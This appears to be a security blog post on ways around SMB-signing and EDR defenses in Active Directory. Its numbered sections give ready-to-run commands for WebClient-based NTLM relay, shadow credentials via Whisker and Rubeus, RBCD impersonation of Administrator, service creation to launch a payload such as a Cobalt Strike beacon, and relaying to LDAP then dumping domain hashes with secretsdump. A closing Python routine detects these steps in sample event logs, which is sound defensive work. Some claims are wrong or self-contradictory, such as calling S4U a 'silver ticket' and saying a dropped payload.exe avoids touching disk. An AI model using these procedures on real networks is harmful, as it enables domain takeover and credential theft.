
Introduction
Traditional NTLM relay attacks are hitting roadblocks as modern defenses harden SMB (port 445) and restrict WMI (port 135). With EDR flagging SAM/SYSTEM registry extraction and SMB signing enforced, attackers must adapt. SpecterOps reveals advanced techniques like Service Control Manager manipulation, Webclient abuse, and shadow credentials to bypass these limitations.
Learning Objectives
- Understand why classic NTLM relay attacks fail in modern environments
- Learn how to abuse Service Control Manager (SCM) for lateral movement
- Master stealthy shadow credential and RBCD attacks against domain controllers
1. Bypassing SMB Signing with Webclient Abuse
Command:
sc.exe config WebClient start= auto
sc.exe start WebClient
What it does:
Enables the WebClient service, allowing HTTP-based NTLM relay instead of SMB (port 445).
Step-by-Step:
1. Check if WebClient is disabled:
sc.exe query WebClient
2. Enable and start it:
sc.exe config WebClient start= auto
sc.exe start WebClient
3. Relay via PetitPotam or PrinterBug to HTTP endpoints.
2. Shadow Credentials for Persistence
Command:
Whisker.exe add /target:DC01 /domain:corp.local /dc:DC01.corp.local /path:C:\temp\cert.pfx /password:P@ssw0rd
What it does:
Adds a Key Credential to a target computer, enabling Rubeus-based Kerberos attacks.
Step-by-Step:
1. Use Whisker to generate a certificate:
Whisker.exe add /target:DC01 /domain:corp.local /dc:DC01.corp.local
2. Extract the TGT with Rubeus:
Rubeus.exe asktgt /user:DC01$ /certificate:C:\temp\cert.pfx /password:P@ssw0rd /ptt
3. RBCD (Resource-Based Constrained Delegation) Attack
Command:
Set-DomainRBCD -Identity DC01 -DelegateFrom COMPROMISED$ -Verbose
What it does:
Configures RBCD to impersonate any service on the DC.
Step-by-Step:
1. Compromise a machine account (`COMPROMISED$`).
2. Assign RBCD rights:
Set-DomainRBCD -Identity DC01 -DelegateFrom COMPROMISED$
3. Use Rubeus for a silver ticket:
Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:CIFS/DC01.corp.local /altservice:LDAP /dc:DC01.corp.local /ptt
4. Evading EDR with Service Control Manager (SCM) Manipulation
Command:
sc.exe create "FakeService" binPath= "C:\malicious\payload.exe" start= auto
What it does:
Creates a malicious service for execution without touching disk (EDR evasion).
Step-by-Step:
1. Upload a payload (e.g., Cobalt Strike beacon).
2. Create a service:
sc.exe create "FakeService" binPath= "C:\malicious\payload.exe" start= auto
3. Start it:
sc.exe start FakeService
5. NTLM Relay to LDAP for Domain Compromise
Command:
ntlmrelayx.py -t ldap://DC01.corp.local --escalate-user
What it does:
Relays NTLM to LDAP, granting DCSync rights.
Step-by-Step:
1. Trigger an NTLM auth (e.g., PrinterBug).
2. Relay to LDAP:
ntlmrelayx.py -t ldap://DC01.corp.local --escalate-user
3. Dump hashes with secretsdump:
secretsdump.py corp.local/Administrator@DC01 -just-dc
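A defender-side counterpart to the five procedures above, added here and not part of the original post or of the SpecterOps research: a small triage routine run over constructed Windows event records (7040 service start-type change, 5136 directory object modification, 7045 service installation, 4662 object access) that flags the WebClient enablement, shadow-credential and RBCD attribute writes, suspicious service creation, and replication-rights use that each section would leave behind. The event IDs, LDAP attribute names and replication-right GUIDs are real; every record, host, user and path in the sample is constructed.

```python
"""Added detection example (not from the original post or SpecterOps): triage
constructed Windows event records for the attacker actions the post describes.
Event IDs, attribute names and the replication GUIDs are real; every record,
host name, user and path below is constructed sample data."""
import re

# Constructed sample events; keys mirror the Windows event XML field names.
SAMPLE_EVENTS = [
    {"EventID": 7040, "ServiceName": "WebClient",
     "Message": "start type changed from disabled to auto start"},
    {"EventID": 5136, "ObjectDN": "CN=DC01,OU=Domain Controllers,DC=corp,DC=local",
     "AttributeLDAPDisplayName": "msDS-KeyCredentialLink", "SubjectUserName": "jdoe"},
    {"EventID": 5136, "ObjectDN": "CN=DC01,OU=Domain Controllers,DC=corp,DC=local",
     "AttributeLDAPDisplayName": "msDS-AllowedToActOnBehalfOfOtherIdentity",
     "SubjectUserName": "jdoe"},
    {"EventID": 7045, "ServiceName": "FakeService", "ImagePath": "C:\\malicious\\payload.exe"},
    {"EventID": 7045, "ServiceName": "Spooler", "ImagePath": "C:\\Windows\\System32\\spoolsv.exe"},
    {"EventID": 4662, "SubjectUserName": "jdoe",
     "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
]

# Writes to these attributes are how shadow credentials and RBCD get planted.
DELEGATION_ATTRS = {"msDS-KeyCredentialLink", "msDS-AllowedToActOnBehalfOfOtherIdentity"}
# Control-access rights DS-Replication-Get-Changes / -All, which DCSync exercises.
REPL_GUIDS = {"1131f6aa-9c07-11d1-f79f-00c04fc2dcd2", "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"}
GUID_RE = re.compile(r"[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}")

def is_domain_controller(dn):
    # Heuristic: computer objects in the default Domain Controllers OU.
    return "OU=Domain Controllers" in dn

def triage(events):
    """Return one (severity, reason) tuple per suspicious event, in input order."""
    findings = []
    for ev in events:
        eid = ev["EventID"]
        if (eid == 7040 and ev.get("ServiceName") == "WebClient"
                and "auto start" in ev.get("Message", "")):
            findings.append(("medium", "WebClient switched to auto start: HTTP NTLM relay surface opened"))
        elif eid == 5136 and ev.get("AttributeLDAPDisplayName") in DELEGATION_ATTRS:
            sev = "high" if is_domain_controller(ev["ObjectDN"]) else "medium"
            findings.append((sev, f"{ev['AttributeLDAPDisplayName']} written on "
                                  f"{ev['ObjectDN']} by {ev['SubjectUserName']}"))
        elif eid == 7045 and not ev.get("ImagePath", "").strip('"').lower().startswith("c:\\windows\\"):
            findings.append(("medium", f"service {ev['ServiceName']} installed from {ev['ImagePath']}"))
        elif (eid == 4662 and not ev["SubjectUserName"].endswith("$")
                and REPL_GUIDS & set(GUID_RE.findall(ev.get("Properties", "").lower()))):
            findings.append(("high", f"replication right used by non-machine account {ev['SubjectUserName']}"))
    return findings
```

Running `triage(SAMPLE_EVENTS)` yields five findings; the legitimate Spooler service install is the only sample record left unflagged.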
What Undercode Says:
- Key Takeaway 1: Modern EDR detects traditional NTLM relay—shift to WebClient, SCM, and RBCD.
- Key Takeaway 2: Shadow credentials + RBCD = persistence without touching LSASS.
Analysis:
Defenders are winning against old-school NTLM relay, but attackers adapt with Kerberos-based attacks. Expect more HTTP-based relaying as SMB hardening increases.
Prediction:
By 2026, NTLM will be deprecated in favor of Kerberos, but attackers will pivot to WS-Management, RPC over HTTP, and cloud-based relay vectors.
Reported By: Specterops Escaping – Hackers Feeds